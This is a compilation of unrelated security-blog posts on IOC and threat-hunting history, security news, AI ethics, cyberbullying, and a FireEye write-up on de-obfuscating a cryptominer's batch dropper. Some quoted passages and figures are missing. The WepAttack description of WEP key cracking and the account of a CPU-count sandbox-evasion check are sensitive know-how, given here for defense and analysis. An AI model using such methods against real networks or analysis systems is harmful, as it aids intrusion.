Indicators of compromise are from Lynn Fischer, Lynn, "Looking for the Unexpected," Security Awareness Bulletin, 3-96, 1996. Richmond, VA: DoD Security Institute.

Here the context is the compromise of a person with a security clearance.

In the same spirit, the earliest reference to "indicator" in a security-specific, detection-oriented context appears in the patent Method and system for reducing the rate of infection of a communications network by a software worm (6 Dec 2002). Stuart Staniford is the lead author; he was later chief scientist at FireEye, although he left before FireEye acquired Mandiant (and me).

While Kevin, et al were publishing the second edition of their IR book in 2003, I was writing my first book, The Tao of Network Security Monitoring. I began chapter two with a discussion of indicators, inspired by my Air Force intelligence officer training in I&W and Kevin's use of the term at Foundstone.

You can find chapter two in its entirety online. In the chapter I also used the term "indicators of compromise," in the spirit Kevin used it; but again, it was not yet a formal, independent term.

My book was published in 2004, followed by two more in rapid succession.

The term "indicators" didn't really make a splash until 2009, when Mike Cloppert published a series on threat intelligence and the cyber kill chain. The most impactful in my opinion was Security Intelligence: Attacking the Cyber Kill Chain. Mike wrote:


I remember very much enjoying these posts, but the Cyber Kill Chain was the aspect that had the biggest impact on the security community. Mike does not say "IOC" in the post. Where he does say "compromise," he's using it to describe a victimized computer.

The stage is now set for seeing indicators of compromise in a modern context. Drum roll, please!

The first documented appearance of the term indicators of compromise, or IOCs, in the modern context, appears in basically two places simultaneously, with ultimate credit going to the same organziation: Mandiant.

The first Mandiant M-Trends report, published on 25 Jan 2010, provides the following description of IOCs on page 9:


The next day, 26 Jan 2010, Matt Frazier published Combat the APT by Sharing Indicators of Compromise to the Mandiant blog. Matt wrote to introduce an XML-based instantiation of IOCs, which could be read and created using free Mandiant tools.


Note how complicated Matt's IOC example is. It's not a file hash (alone), or a file name (alone), or an IP address, etc. It's a Boolean expression of many elements. You can read in the text that this original IOC definition rejects what some commonly consider "IOCs" to be. Matt wrote:

Historically, compromise data has been exchanged in CSV or PDFs laden with tables of "known bad" malware information - name, size, MD5 hash values and paragraphs of imprecise descriptions... (emphasis added)

On a related note, I looked for early citations of work on defining IOCs, and found a paper by Simson Garfinkel, well-respected forensic analyst. He gave credit to Matt Frazier and Mandiant, writing in 2011:

Frazier (2010) of MANDIANT developed Indicators of Compromise (IOCs), an XML-based language designed to express signatures of malware such as files with a particular MD5 hash value, file length, or the existence of particular registry entries. There is a free editor for manipulating the XML. MANDIANT has a tool that can use these IOCs to scan for malware and the so-called “Advanced Persistent Threat.”

Starting in 2010, the debate was initially about the format for IOCs, and how to produce and consume them. We can see in this written evidence from 2010, however, a definition of indicators of compromise and IOCs that contains all the elements that would be recognized in current usage.

tl;dr Mandiant invented the term indicators of compromise, or IOCs, in 2010, building off the term "indicator," introduced widely in a detection context by Kevin Mandia, no later than his 2003 incident response book.

(1) Yes, a BS, not a BA -- thank you USAFA for 14 mandatory STEM classes.

Risky Biz Soap Box: MITRE ATT&CK Matrix, misconfigured security controls, attack sim and more!

The Soap Box podcast series is a wholly sponsored podcast series we do here at Risky.Biz – vendors pay to participate. This Soap Box edition is brought to you by AttackIQ.

AttackIQ is a five-year-old company that makes an attack simulation platform. The idea is you agitate a network with suspicious traffic and activities, then measure what the response looks like on the other side. As you’ll hear, Stephan argues this is a better way to test your controls than trying to do it after an incident has been and gone.

Mostly people are using it to verify the effectiveness of their security controls. They already have endpoint security software, IDS, various monitoring bits and pieces, but quite often this stuff just isn’t tuned right. So, you throw some attack traffic and behaviour at your systems and see what bubbles up

One piece of work that has been absolutely vital to AttackIQ’s success is the MITRE ATT&CK Matrix. Like AttackIQ, the ATT&CK Matrix has been around for five years.

Stephan Chenette is AttackIQ’s CTO and he joined me to talk all about how they’re trying to use the ATT&CK Matrix to drive their whole outlook, and, conversely, how they’re spending time talking to MITRE about where the whole thing is going.

Even More on Threat Hunting

In response to my post More on Threat Hunting, Rob Lee asked:

[D]o you consider detection through ID’ing/“matching” TTPs not hunting?

To answer this question, we must begin by clarifying "TTPs." Most readers know TTPs to mean tactics, techniques and procedures, defined by David Bianco in his Pyramid of Pain post as:

How the adversary goes about accomplishing their mission, from reconnaissance all the way through data exfiltration and at every step in between.

In case you've forgotten David's pyramid, it looks like this.


It's important to recognize that the pyramid consists of indicators of compromise (IOCs). David uses the term "indicator" in his original post, but his follow-up post from his time at Sqrrl makes this clear:

There are a wide variety of IoCs ranging from basic file hashes to hacking Tactics, Techniques and Procedures (TTPs). Sqrrl Security Architect, David Bianco, uses a concept called the Pyramid of Pain to categorize IoCs. 

At this point it should be clear that I consider TTPs to be one form of IOC.

In The Practice of Network Security Monitoring, I included the following workflow:

You can see in the second column that I define hunting as "IOC-free analysis." On page 193 of the book I wrote:

Analysis is the process of identifying and validating normal, suspicious, and malicious activity. IOCs expedite this process. Formally, IOCs are manifestations of observable or discernible adversary actions. Informally, IOCs are ways to codify adversary activity so that technical systems can find intruders in digital evidence...

I refer to relying on IOCs to find intruders as IOC-centric analysis, or matching. Analysts match IOCs to evidence to identify suspicious or malicious activity, and then validate their findings.

Matching is not the only way to find intruders. More advanced NSM operations also pursue IOC-free analysis, or hunting. In the mid-2000s, the US Air Force popularized the term hunter-killer in the digital world. Security experts performed friendly force projection on their networks, examining data and sometimes occupying the systems themselves in order to find advanced threats. 

Today, NSM professionals like David Bianco and Aaron Wade promote network “hunting trips,” during which a senior investigator with a novel way to detect intruders guides junior analysts through data and systems looking for signs of the adversary. 

Upon validating the technique (and responding to any enemy actions), the hunters incorporate the new detection method into a CIRT’s IOC-centric operations. (emphasis added)

Let's consider Chris Sanders' blog post titled Threat Hunting for HTTP User Agents as an example of my definition of hunting. 

I will build a "hunting profile" via excerpts (in italics) from his post:

Assumption: "Attackers frequently use HTTP to facilitate malicious network communication."

Hypothesis: If I find an unusual user agent string in HTTP traffic, I may have discovered an attacker.

Question: “Did any system on my network communicate over HTTP using a suspicious or unknown user agent?”

Method: "This question can be answered with a simple aggregation wherein the user agent field in all HTTP traffic for a set time is analyzed. I’ve done this using Sqrrl Query Language here:

SELECT COUNT(*),user_agent FROM HTTPProxy GROUP BY user_agent ORDER BY COUNT(*) ASC LIMIT 20

This query selects the user_agent field from the HTTPProxy data source and groups and counts all unique entries for that field. The results are sorted by the count, with the least frequent occurrences at the top."

Results: Chris offers advice on how to interpret the various user agent strings produced by the query.

This is the critical part: Chris did not say "look for *this user agent*. He offered the reader an assumption, a hypothesis, a question, and a method. It is up to the defender to investigate the results. This, for me, is true hunting.

If Chris had instead referred users to this list of malware user agents (for example) and said look for "Mazilla/4.0", then I consider that manual (human) matching. If I created a Snort or Suricata rule to look for that user agent, then I consider that automated (machine) matching.

This is where my threat hunting definition likely diverges from modern practice. Analyst Z sees the results of Chris' hunt and thinks "Chris found user agent XXXX to be malicious, so I should go look for it." Analyst Z queries his or her data and does or does not find evidence of user agent XXXX.

I do not consider analyst Z's actions to be hunting. I consider it matching. There is nothing wrong with this. In fact, one of the purposes of hunting is to provide new inputs to the matching process, so that future hunting trips can explore new assumptions, hypotheses, questions, and methods, and let the machines do the matching on IOCs already found to be suggestive of adversary activity. This is why I wrote in my 2013 book "Upon validating the technique (and responding to any enemy actions), the hunters incorporate the new detection method into a CIRT’s IOC-centric operations."

The term "hunting" is a victim of its own success, with emotional baggage. We defenders have finally found a way to make "blue team" work appealing to the wider security community. Vendors love this new way to market their products. "If you're not hunting, are you doing anything useful?" one might ask.

Compared to "I'm threat hunting!" (insert chest beating), the alternative, "I'm matching!" (womp womp), seems sad. 

Nevertheless, we must remember that threat hunting methodologies were invented to find adversary activity for which there were no IOCs. Hunting was IOC-free analysis because we didn't know what to look for. Once you know what to look for, you are matching. Both forms of detection require analysis to validate adversary activity, of course. Let's not forget that.

I'm also very thankful, however it's defined or packaged, that people are excited to search for adversary activity in their environment, whether via matching or hunting. It's a big step from the mindset of 10 years ago, which had a "prevention works" milieu.

tl;dr Because TTPs are a form of IOC, then detection via matching IOCs is a form of matching, and not hunting.

More on Threat Hunting

Earlier this week hellor00t asked via Twitter:

Where would you place your security researchers/hunt team?

I replied:

For me, "hunt" is just a form of detection. I don't see the need to build a "hunt" team. IR teams detect intruders using two major modes: matching and hunting. Junior people spend more time matching. Senior people spend more time hunting. Both can and should do both functions.

This inspired Rob Lee to blog a response, from which I extract his core argument:

[Hunting] really isn’t, to me, about detecting threats...

Hunting is a hypothesis-led approach to testing your environment for threats. The purpose, to me, is not in finding threats but in determining what gaps you have in your ability to detect and respond to them...

In short, hunting, to me, is a way to assess your security (people, process, and technology) against threats while extending your automation footprint to better be prepared in the future. Or simply stated, it’s incident response without the incident that’s done with a purpose and contributes something. 

As background for my answer, I recommend my March 2017 post The Origin of Threat Hunting, which cites my article "Become a Hunter," published in the July-August 2011 issue of Information Security Magazine. I wrote it in the spring of 2011, when I was director of incident response for GE-CIRT.

For the term "hunting," I give credit to briefers from the Air Force and NSA who, in the mid-2000s briefed "hunter-killer" missions to the Red Team/Blue Team Symposium at the Johns Hopkins University Applied Physics Lab in Laurel, MD.

As a comment to that post, Tony Sager, who ran NSA VAO at the time I was briefed at ReBl, described hunting thus:

[Hunting] was an active and sustained search for Attackers...

For us, "Hunt" meant a very planned and sustained search, taking advantage of the existing infrastructure of Red/Blue Teams and COMSEC Monitoring, as well as intelligence information to guide the search. 

For the practice of hunting, as I experienced it, I give credit to our GE-CIRT incident handlers -- David Bianco,  Ken Bradley, Tim Crothers, Tyler Hudak, Bamm Visscher, and Aaron Wade -- who took junior analysts on "hunting trips," starting in 2008-2009.

It is very clear, to me, that hunting has always been associated with detecting an adversary, not "determining what gaps you have in your ability to detect and respond to them," as characterized by Rob.

For me, Rob is describing the job of an enterprise visibility architect, which I described in a 2007 post:

[W]e are stuck with numerous platforms, operating systems, applications, and data (POAD) for which we have zero visibility. 

I suggest that enterprises consider hiring or assigning a new role -- Enterprise Visibility Architect. The role of the EVA is to identify visibility deficiencies in existing and future POAD and design solutions to instrument these resources.

A primary reason to hire an enterprise visibility architect is to build visibility in, which I described in several posts, including this one from 2009 titled Build Visibility In. As a proponent of the "monitor first" school, I will always agree that it is important to identify and address visibility gaps.

So where do we go from here?

Tony Sager, as one of my wise men, offers sage advice at the conclusion of his comment:

"Hunt" emerged as part of a unifying mission model for my Group in the Information Assurance Directorate at NSA (the defensive mission) in the mid-late 2000's. But it was also a way to unify the relationship between IA and the SIGINT mission - intelligence as the driver for Hunting. The marketplace, of course, has now brought its own meaning to the term, but I just wanted to share some history. 

In my younger days I might have expressed much more energy and emotion when encountering a different viewpoint. At this point in my career, I'm more comfortable with other points of view, so long as they do not result in harm, or a waste of my taxpayer dollars, or other clearly negative consequences. I also appreciate the kind words Rob offered toward my point of view.

tl;dr I believe the definition and practice of hunting has always been tied to adversaries, and that Rob describes the work of an enterprise visibility architect when he focuses on visibility gaps rather than adversary activity.

Update 1: If in the course of conducting a hunt you identify a visibility or resistance deficiency, that is indeed beneficial. The benefit, however, is derivative. You hunt to find adversaries. Identifying gaps is secondary although welcome.

The same would be true of hunting and discovering misconfigured systems, or previously unidentified assets, or unpatched software, or any of the other myriad facts on the ground that manifest when one applies Clausewitz's directed telescope towards their computing environment.

WepAttack – WLAN 802.11 WEP Key Hacking Tool

WepAttack – WLAN 802.11 WEP Key Hacking Tool

WepAttack is a WLAN open source Linux WEP key hacking tool for breaking 802.11 WEP keys using a wordlist based dictionary attack.

This tool is based on an active dictionary attack that tests millions of words to find the right key. Only one packet is required to start an attack.

What is a WEP Key?

Wired Equivalent Privacy (WEP) is a security algorithm for IEEE 802.11 wireless networks. Introduced as part of the original 802.11 standard ratified in 1997, its intention was to provide data confidentiality comparable to that of a traditional wired network.[1] WEP, recognizable by its key of 10 or 26 hexadecimal digits (40 or 104 bits), was at one time widely in use and was often the first security choice presented to users by router configuration tools.

Read the rest of WepAttack – WLAN 802.11 WEP Key Hacking Tool now! Only available at Darknet.

Gmail encryption: Everything you need to know

Encryption may sound like a subject best left to hackers and tinfoil hat wearers, but don't be fooled: It's a critical part of contemporary life and something that's important for everyone, especially business users, to understand. And one of the places where encryption is most relevant and misunderstood is in the realm of email.

If you're using Gmail for electronic communication — be it for business, for personal use, or a combination of the two — it's well worth your while to know how the service does and doesn't secure your information and what steps you can take to make sure you're getting the level of privacy you need.

Ready to dive in?

To read this article in full, please click here

VirusTotal += Trapmine

We welcome Trapmine scanner to VirusTotal. In the words of the company:

“Trapmine ThreatScore is a machine learning-powered malware detection engine developed to identify known and never-before-seen malware. This engine is a part of TRAPMINE Endpoint Detection & Protection Platform. Trapmine combines machine learning, behavior monitoring and endpoint deception techniques to provide fool-proof defense against malware, exploit attempts, file-less malware, ransomware and other forms of targeted attacks. Windows PE files submitted to VirusTotal will be analyzed by Trapmine ML engine and the verdicts will be displayed to VirusTotal users.”

Trapmine has expressed its commitment to follow the recommendations of AMTSO and, in compliance with our policy, facilitates this review by MRG Effitas, an AMTSO-member tester.

Ethics In Artificial Intelligence: Introducing The SHERPA Consortium

In May of this year, Horizon 2020 SHERPA project activities kicked off with a meeting in Brussels. F-Secure is a partner in the SHERPA consortium – a group consisting of 11 members from six European countries – whose mission is to understand how the combination of artificial intelligence and big data analytics will impact ethics and human rights issues today, and in the future (https://www.project-sherpa.eu/).

As part of this project, one of F-Secure’s first tasks will be to study security issues, dangers, and implications of the use of data analytics and artificial intelligence, including applications in the cyber security domain. This research project will examine:

  • ways in which machine learning systems are commonly mis-implemented (and recommendations on how to prevent this from happening)
  • ways in which machine learning models and algorithms can be adversarially attacked (and mitigations against such attacks)
  • how artificial intelligence and data analysis methodologies might be used for malicious purposes

We’ve already done a fair bit of this research*, so expect to see more articles on this topic in the near future!

 

As strange as it sounds, I sometimes find powerpoint a good tool for arranging my thoughts, especially before writing a long document. As an added bonus, I have a presentation ready to go, should I need it.

 

 

Some members of the SHERPA project recently attended WebSummit in Lisbon – a four day event with over 70,000 attendees and over 70 dedicated discussions and panels. Topics related to artificial intelligence were prevalent this year, ranging from tech presentations on how to develop better AI, to existential debates on the implications of AI on the environment and humanity. The event attracted a wide range of participants, including many technologists, politicians, and NGOs.

During WebSummit, SHERPA members participated in the Social Innovation Village, where they joined forces with projects and initiatives such as Next Generation Internet, CAPPSI, MAZI, DemocratieOuverte, grassroots radio, and streetwize to push for “more social good in technology and more technology in social good”. Here, SHERPA researchers showcased the work they’ve already done to deepen the debate on the implications of AI in policing, warfare, education, health and social care, and transport.

The presentations attracted the keen interest of representatives from more than 100 large and small organizations and networks in Europe and further afield, including the likes of Founder’s Institute, Google, and Amazon, and also led to a public commitment by Carlos Moedas, the European Commissioner for Research, Science and Innovation. You can listen to the highlights of the conversation here.

To get a preview of SHERPA’s scenario work and take part in the debate click here.

 


* If you’re wondering why I haven’t blogged in a long while, it’s because I’ve been hiding away, working on a bunch of AI-related research projects (such as this). Down the road, I’m hoping to post more articles and code – if and when I have results to share 😉

What is the impact of Brexit on GDPR?

Brexit introduces a host of uncertainties for businesses in the UK, in the remaining EU states, and in other countries that do business with the UK and the wider EU. Data protection has been a particular point of focus in the past year, due to the

The Who, What, and How of Cyberbullying

The internet has allowed society to stay connected in more ways than ever before. We can speak to strangers across the globe, connect with loved ones in an instant, and share our lives publicly. As much as the internet has connected us in positive, eye-opening ways, its interactive nature has also created a new problem for active users everywhere – cyberbullying. Though the problem is becoming all too common, many out there don’t fully understand the ins and outs of cyberbullying. Let’s take a deep dive into the phenomenon.

What is Cyberbullying

Just like it sounds, cyberbullying is when bullies take their insults and ill will to the internet. According to StopBullying.gov, “Cyberbullying is bullying that takes place over digital devices like cell phones, computers, and tablets. Cyberbullying can occur through SMS, Text, and apps, or online in social media, forums, or gaming where people can view, participate in, or share content. Cyberbullying includes sending, posting, or sharing negative, harmful, false, or mean content about someone else.” The key objective of cyberbullying is to embarrass the subject of the attack, though sometimes the bully can view the act as justified revenge or simply non-intentional.

Types of Cyberbullies

Evolved from the classic schoolyard bullies of old, these cyberbullies can actually take a variety of forms depending on their attack vector and intent. In fact, there are said to be four types of cyberbullies: the Vengeful Angel, the Power Hungry Cyberbully, Revenge of the Nerds/Inadvertent Cyberbully, and Mean Girls. The Vengeful Angel bullies in order to protect the weak/other victims, and often take the action to protect a loved or friend. The Power Hungry archetype, however, is just a nasty, unkind person who wants to display dominance and control over others. Then there’s the Inadvertent Cyberbully, who are usually the ones getting bullied online or in real life and are typically trying to enact some form of justice or revenge anonymously from the web. Mean Girls are the opposite – and take their online actions in order to impress a group of friends or gain social status.

Cyberbullying Methods

Not only is there a variety in the kind of bullies across the web, but also a plethora of types of cyberbullying techniques these meanies use to bother their victims. First and foremost, there’s Harassment, which involves repeated, offensive messages sent to a victim by a bully on some type of online medium. These messages can be rude, personal, and even threatening, with one recent example emerging between two wives of professional hockey players. Similar to harassment is Flaming – an online fight conducted via emails, social media messages, chat rooms, you name it.

Then there are very targeted attacks, named Exclusion and Outing. With Exclusion, cyberbullies select one individual to single out. Exclusion is a popular method, with examples popping up everywhere, from high students in Iowa to well-known celebrities. With Outing, these harassers share private information, photos, and videos of a single person to humiliate them online. There’s also the anonymous angle, AKA Masquerading, where a cyberbully creates a fake online identity to belittle, harass, and degrade their victim – which a nurse in New Zealand was a victim of for a whopping 5 years.

Next Steps for Both Parents and Kids

Typically, cyberbullying is a common occurrence amongst teens who are navigating the trials and tribulations of middle school and high school. But that doesn’t mean its exclusive to teens, and that doesn’t mean there aren’t steps parents and kids alike can do to stop cyberbullying in its tracks.

If you’re the subject of cyberbullying, the first thing you need to do is block the bully. Then, make sure you collect evidence – take screenshots, print the proof, do whatever you can do have material to back up your claim. It depends on the type of cyberbullying at work, but you can also use the internet to your advantage and look up relevant resources/hotlines/support to aid with your issue.

If you’re a parent, the most important thing is communication. Make yourself available as a resource and remind your kids that they can tell you anything that’s happening in their online world. Beyond that, continuously weave cybersecurity into your family discussions. Remind kids of the simple steps they can take to be safe online, and make sure they know when to flag a cyberbully or online scheme.

There are also technical avenues you can take to protect your kid online. Look into solutions that will help you monitor your family’s online interactions, such as McAfee Safe Family. This solution, for instance, can help you set rules and time limits for apps and websites and see what your kids are up to at a glance. Of course, these solutions are not the be-all and end-all for stopping cyberbullying, but they can help.

Now, there’s still a lot more research that has to be done to fully understand the cyberbullying problem society is faced with. So as this problem continues to evolve, so must the research, solutions, and regulations that will be created to combat the issue. With the right proactive action, people everywhere can stand up to cyberbullies.

To learn more about family safety and our approach to it, be sure to follow us at @McAfee and @McAfee_Home.

The post The Who, What, and How of Cyberbullying appeared first on McAfee Blogs.

Risky Business #521 — Bears everywhere

This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

  • Cozy Bear is back, Fancy Bear has new tooling
  • Russian government wants DNC lawsuit thrown out
  • Cyber Command submitting samples to VirusTotal
  • Google BGP shenanigans
  • Australian/China Telecom BGP shenanigans
  • All the recent Facebook drama
  • More speculative execution bugs
  • Julian Assange likely to be charged
  • Vault7 leaker facing new charges
  • Phineas Fisher investigation abandoned
  • Bitcoin/Tether link probed by DoJ, btc in free-fall
  • MUCH MOAR

This week’s show is brought to you by Proofpoint.

Sherrod DeGrippo, Proofpoint’s director of threat research and detection is this week’s sponsor guest. Surprisingly, she tells us that ransomware via email is a dead duck.

Links to everything that we discussed are below. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes

Russia’s Cozy Bear comes out of hiding with post-election spear-phishing blitz | Ars Technica
Russia's Fancy Bear and Cozy Bear Hackers May Have New Phishing Tricks | WIRED
Russia wants DNC hack lawsuit thrown out, citing international conventions | ZDNet
Russian Trolls Sue Facebook, Their Old Propaganda Machine
Ukraine detects new Pterodo backdoor malware, warns of Russian cyberattack | Ars Technica
US Cyber Command starts uploading foreign APT malware to VirusTotal | ZDNet
Google goes down after major BGP mishap routes traffic through China | Ars Technica
How China diverts, then spies on Australia's internet traffic
Rob Joyce on Twitter: "I hope this latest fiasco of traffic rerouting through China is the wakeup call for all of us to get serious about addressing the massive and unacceptable vulnerability inherent in today’s BGP routing architecture. https://t.co/dSTVIOltsF"
Everything you need to know about Facebook’s latest crisis - Recode
Facebook has been accused of peddling anti-Semitic conspiracy theories - Vox
Yes, Facebook made mistakes in 2016. But we weren’t the only ones. - The Washington Post
Researchers discover seven new Meltdown and Spectre attacks | ZDNet
The US Department of Justice is reportedly preparing to indict WikiLeaks founder Julian Assange | Business Insider
Julian Assange has been charged, prosecutors reveal inadvertently in court filing
Accused 'Vault 7' leaker to face new charges
Hacking Team Hacker Phineas Fisher Has Gotten Away With It - Motherboard
Bitcoin Price Manipulated by Tether? Justice Department Probing - Bloomberg
A Browser Extension Apparently Stole The Private Facebook Messages Of At Least 81,000 Accounts | Gizmodo Australia
The Hack Millions of People Are Installing Themselves - Motherboard
Facebook patches another bug that could have allowed mass-harvesting of user data | ZDNet
Trump signs bill that creates the Cybersecurity and Infrastructure Security Agency | ZDNet
AWS rolls out new security feature to prevent accidental S3 data leaks | ZDNet
Most ATMs can be hacked in under 20 minutes | ZDNet
Deserialization issues also affect Ruby, not just Java, PHP, and .NET | ZDNet
Adobe ColdFusion servers under attack from APT group | ZDNet
VirtualBox zero-day published by disgruntled researcher | ZDNet
Office 365, Azure users are locked out after a global multi-factor authentication outage | TechCrunch
Cisco says a flaw in its Adaptive Security Appliance allows remote attacks
He Helped People Cheat at Grand Theft Auto. Then His Home Was Raided. - The New York Times
Proofpoint

Instagram Bug Accidentally Reveals User Passwords

Facebook and Instagram have been having a rough go of it this year.

According to The Information, some Instagram users who made use of the platform's new feature received notification that their passwords were showing up in the URL of their web browsers. What's more, this information was also stored on Facebook's servers, causing a greater issue for anyone using a shared computer or an insecure network.

Reports from Fortune indicate that Instagram staff discovered the bug, which only affected a small number of users. The information was reportedly not exposed outside of the company. A spokesperson for Instagram also told Fortune that the tool has been updated and that it's deleting any logged passwords. It’s recommended that any affected users change their passwords and clear their browser history.

Twitter faced a similar issue in May, and urged all of it's users to change their passwords after an error in the hashing process saved user passwords in plain text to an internal log rather than masking them.

Stakes are High for Businesses to Meet GDPR Compliance - and They're Feeling the Heat

Instagram published the download your data tool in order to comply with new GDPR regulation and to offer their users a deeper look into all of the data the company had collected about them. The tool allows users to copy their photos, videos, and messages to their computers. Some say that in addition to meeting compliance, this move was meant to shine Facebook in a better light following the Cambridge Analytica scandal.

However, in September, Facebook announced that it had discovered attackers exploited a vulnerability in its code that impacted its "View As" feature, enabling them to Facebook access tokens – digital keys that allow users to stay logged in whether or not they’re actively using the application – which could then be used to take over user accounts. The breach is reportedly a result of multiple issues within Facebook's code, stemming from changes made to the social media platform’s video-uploading feature in July of last year that impacted the “View As” feature. Roughly 50 million accounts were affected, with as many as 90 million users required to log back into their accounts across devices.

According to a report from Silicon Republic, Ireland's Data Protection Commission has confirmed that it is investing the data breach, and that Facebook could face up to $1.6 billion in fines if it is found to have breached GDPR requirements. This could be one of the first major tests of the GDPR legislation.

Consumers and the Enterprise Alike Need to be More Discerning About Security

You would be hard pressed to find an executive that wants to see his or her company's software to be the one that leaks sensitive customer data in a cyberattack or otherwise. You would also be hard pressed to find a consumer who’d be happy that organizations' with their most sensitive personally identifiable information have been breached. Or that the organization may be leaking their passwords out into the worldwide web. As organizations continue to move in the right direction, reviewing the security of the software they purchase more closely, consumers must also leave behind their apathy in favor of adopting practices that help keep them safe online.

Cmd and Conquer: De-DOSfuscation with flare-qdb

When Daniel Bohannon released his excellent DOSfuscation paper, I was fascinated to see how tricks I used as a systems engineer could help attackers evade detection. I didn’t have much to contribute to this conversation until I had to analyze a hideously obfuscated batch file as part of my job on the FLARE malware queue.

Previously, I released flare-qdb, which is a command-line and Python-scriptable debugger based on Vivisect. I previously wrote about how to use flare-qdb to instrument and modify malware behavior. Flare-qdb also made a guest appearance in Austin Baker and Jacob Christie’s SANS DFIR Summit 2017 briefing, inducing the Windows event log service to exclude process creation events. In this blog post, I will show how I used flare-qdb to bring “script block logging” to the Windows command interpreter. I will also share an Easter Egg that I found by flipping only a single bit in the process address space of cmd.exe. Finally, I will share the script that I added to flare-qdb so you can de-obfuscate malicious command scripts yourself by executing them (in a safe environment, of course). But first, I’ll talk about the analysis that led me to this solution.

At First Glance

Figure 1 shows a batch script (MD5 hash 6C8129086ECB5CF2874DA7E0C855F2F6) that has been obfuscated using the BatchEncryption tool referenced in Daniel Bohannon’s paper. This file does not appear in VirusTotal as of this writing, but its dropper does (the MD5 hash is ABD0A49FDA67547639EEACED7955A01A). My goal was to de-obfuscate this script and report on what the attacker was doing.


Figure 1: Contents of XYNT.bat

This 165k batch file is dropped as C:\Windows\Temp\XYNT.bat and executed by its dropper. Its commands are built from environment variable substrings. Figure 2 shows how to use the ECHO command to decode the first command.


Figure 2: Partial command decoding via the ECHO command

The script uses hundreds of commands to set environment variables that are ultimately expanded to de-obfuscate malicious commands. A tedious approach to de-obfuscating this script would be to de-fang each command by prepending an ECHO statement to print each de-obfuscated command to the console. Unfortunately, although the ECHO command can “decode” each command, BatchEncryption needs the SET commands to be executed to decode future commands. To decode this script while allowing the full malicious functionality to run as expected, you would have to iteratively and carefully echo and selectively execute a few hundred obfuscated SET commands.

The irony of BatchEncryption is that batch scripts are viewed as being easy to de-obfuscate, making binary code the safer place to hide logic from the prying eyes of network defenders. But BatchEncryption adds a formidable barrier to analysis by its extensive, layered use of environment variables to rebuild the original commands.

Taking Cmd of the Situation

I decided to see if it would be easier to instrument cmd.exe to log commands rather than de-obfuscating the script myself. To begin, I debugged cmd.exe, set a breakpoint on CreateProcessW, and executed a program from the command prompt. Figure 3 shows the call stack for CreateProcessW as cmd.exe executes notepad.


Figure 3: Call stack for CreateProcessW in cmd.exe

Starting from cmd!ExecPgm, I reviewed the disassembly of the above functions in cmd.exe to trace the origin of the command string up the call stack. I discovered cmd!Dispatch, which receives not a string but a structure with pointers to the command, arguments, and any I/O redirection information (such as redirecting the standard output or error streams of a program to a file or device). Testing revealed that these strings had all their environment variables expanded, which means we should be able to read the de-obfuscated commands from here.

Figure 4 is an exploration of this structure in WinDbg after running the command "echo hai > nul". This command prints the word hai to the standard output stream but uses the right-angle bracket to redirect standard output to the NUL device, which discards all data. The orange boxes highlight non-null pointers that got my attention during analysis, and the arrows point to the commands I used to discover their contents.


Figure 4: Exploring the interesting pointers in 2nd argument to cmd!Dispatch

Because users can redirect multiple I/O streams in a single command, cmd.exe represents I/O redirection with a linked list. For example, the command in Listing 1 shows redirection of standard output (stream #1 is implicit) to shares.txt and standard error (stream #2 is explicitly referenced) to errors.txt.

net use > shares.txt 2>errors.txt

Listing 1: Command-line I/O redirection example

Figure 5 shows the command data structure and the I/O redirection linked list in block diagram format.


Figure 5: Command data structure diagram

By inspection, I found that cmd!Dispatch is responsible for executing both shell built-ins and executable programs, so unlike breaking on CreateProcess, it will not miss commands that do not result in process creation. Based on these findings, I wrote a flare-qdb script to parse and dump commands as they are executed.

Introducing De-DOSfuscator

De-DOSfuscator uses flare-qdb and Vivisect to hook the Dispatch function in cmd.exe and parse commands from memory. The De-DOSfuscator script runs in a 64-bit Python 2 interpreter and dumps commands to both the console and a log file. The script comes with the latest version of flare-qdb and is installed as a Python entry point named dedosfuscator.exe.

De-DOSfuscator relies on the location of the non-exported Dispatch function to log commands, and its location varies per system. For convenience, if an Internet connection is available, De-DOSfuscator automatically retrieves this function’s offset using Microsoft’s symbol server. To allow offline use, you can supply the path to a copy of cmd.exe from your offline machine to the --getoff switch to obtain this offset. You can then supply that output as the argument to the --useoff switch in your offline machine to inform De-DOSfuscator where the function is located. Alternately, you can use De-DOSfuscator with a downloaded PDB or a local symbol cache containing the correct symbols.

Figure 6 demonstrates getting and using the offset in a single session. Note that for this to work in an isolated VM, you would instead specify the path to a copy of the guest’s command interpreter specific to that VM.


Figure 6: Getting and using offsets and testing De-DOSfuscator

This works great on the BatchEncrypted script in Figure 1. Let’s have a look.

Results

Figure 7 shows the log created by De-DOSfuscator after running XYNT.bat. Hundreds of lines of SET statements progressively build environment variables for composing further commands. Keen eyes will also note a misspelling of the endlocal command-line extension keyword.


Figure 7: Beginning of dumped commands

These environment variable manipulations give way to real commands as shown in Figure 8. One of the script’s first actions is to use reg.exe to check the NUMBER_OF_PROCESSORS environment variable. This analysis system only had one vCPU, which can be seen in the set "a=1" output on line 620. After this, the script executes goto del, which branches to a batch label that ultimately deletes the script and other dropped files.


Figure 8: Anti-sandbox measure

This is a batch-oriented spin on a common sandbox evasion trick. It works because many malware analysis sandboxes run with a single CPU to minimize hypervisor resources, whereas most modern systems have at least two CPU cores. Now that we can easily read the script’s commands, it is trivial to circumvent this evasion by, for example, increasing the number of vCPUs available to the VM. Figure 9 shows De-DOSfuscator log after inducing the rest of the code to run.


Figure 9: After circumventing anti-sandbox measure

XYNT.bat calls a dropped binary to create and start a Windows service for persistence. The largest dropped binary is a variant of the XMRig cryptocurrency miner, and many of the services and executables referenced by the script also appear to be cryptocurrency-related.

Happy Easter

Easter is a long way off, but I must present you with a very early Easter Egg because it is such a neat little find. During my journey through cmd.exe, I noticed a variable named fDumpParse having only one cross-reference that seemed to control an interesting behavior. The lone cross-reference and the relevant code are shown in Figure 10. Although fDumpParse is inaccessible anywhere else in the code, it controls whether a function is called to dump information about the command that has been parsed.


Figure 10: fDumpParse evaluation and cross-refs (EDI is NULL)

To experiment with this, you can use De-DOSfuscator’s --fDumpParse switch. You will then be greeted with a command prompt that is more transparent about what it has parsed. Figure 11 shows an example along with a graphical representation of the abstract syntax tree (AST) of parsed command tokens.


Figure 11: Command interpreter with fDumpParse set

Microsoft probably inserted the fDumpParse flag so developers could debug issues with cmd.exe. Unfortunately, as nifty as this is, it has drawbacks for bulk de-obfuscation:

  • This output is harder to read than plain commands, because it dumps the tree in preorder traversal rather than inorder like it was typed.
  • Output copied from the console may contain extraneous line breaks depending on the console host program’s text wrapping behavior.
  • Scrolling in the command interpreter to read or copy output can be tedious.
